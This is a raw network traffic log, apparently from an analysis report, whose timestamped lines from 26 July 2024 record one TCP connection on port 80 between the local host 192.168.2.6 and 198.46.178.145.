Jul 26, 2024 12:57:51.481213093 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481228113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481240034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481251955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481297970 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481297970 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481311083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481323957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481333971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481345892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481353998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481364965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481373072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481379986 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481389999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481400013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481408119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481416941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481436014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481467962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482059002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482069969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482081890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482093096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482101917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482115030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482132912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482152939 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482449055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482460976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482470989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482481956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482491970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482503891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482510090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482537031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482563019 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482605934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482614994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482625008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482635975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482645988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482651949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482664108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482673883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482681036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482690096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482702971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482707977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482718945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.482724905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.482769012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483258963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483268976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483278036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483287096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483298063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483309984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483329058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483336926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483346939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483355045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483362913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483375072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483383894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483390093 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483401060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483411074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483421087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483428001 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483436108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483445883 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483452082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483463049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483469963 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483479023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483488083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.483495951 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.483517885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.500138044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500158072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500168085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500221968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500228882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.500238895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500250101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500257015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.500305891 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.500328064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.500370026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574234962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574253082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574264050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574314117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574373007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574433088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574443102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574454069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574464083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574464083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574475050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574493885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574728966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574738979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574749947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574760914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574768066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574776888 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574788094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574798107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.574806929 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.574851036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575050116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575090885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575115919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575126886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575156927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575172901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575217962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575263023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575340033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575350046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575361013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575372934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575376987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575397015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575436115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575498104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575541019 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575598955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575608015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575617075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575627089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575635910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575649977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575659037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575671911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575676918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575686932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575695038 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575702906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.575719118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.575743914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576158047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576165915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576176882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576186895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576194048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576203108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576214075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576219082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576229095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576240063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576252937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576257944 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576275110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576297998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576760054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576769114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576780081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576788902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576797009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576807022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576816082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576823950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576833963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576844931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576857090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576860905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576873064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576879025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576889038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576899052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576905966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576915026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576925039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576929092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576940060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576948881 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.576960087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.576998949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577594995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577605009 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577615023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577625036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577632904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577641010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577651024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577661037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577667952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577676058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577687025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577694893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577702045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577711105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577723026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577729940 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577738047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577749968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577756882 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577765942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577775002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577785969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577792883 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.577821016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.577845097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578535080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578543901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578552961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578562975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578572035 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578577995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578588963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578597069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578604937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578613997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578625917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578633070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578640938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578649998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578656912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578665972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578675032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578684092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578691959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578701973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578708887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578717947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578727961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.578732967 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.578764915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579426050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579437017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579446077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579456091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579464912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579472065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579482079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579493046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579499960 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579509020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579520941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579536915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579570055 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579828024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579838037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579849005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579862118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579866886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579874992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.579901934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.579936981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.595921040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.595938921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.595947027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.595990896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.596009016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.596019030 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.596025944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.596067905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.596153975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.596163034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.596173048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.596198082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.596214056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670195103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670203924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670223951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670229912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670237064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670275927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670372009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670387030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670397997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670408010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670418024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670424938 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670475960 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670577049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670625925 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670644999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670654058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670664072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670671940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670691967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670732975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670800924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670846939 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.670865059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670874119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.670914888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671041965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671051979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671061039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671071053 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671080112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671091080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671122074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671303988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671319008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671329975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671339035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671350002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671355009 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671365976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671395063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671431065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671581984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671631098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671648979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671658993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671704054 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671789885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671799898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671811104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.671833992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.671854973 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.672178984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672190905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672200918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672210932 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672219992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672228098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.672236919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672249079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672260046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672266960 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.672276020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672287941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672301054 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.672322989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.672735929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.672745943 CEST	80	60836	198.46.178.145	192.168.2.6
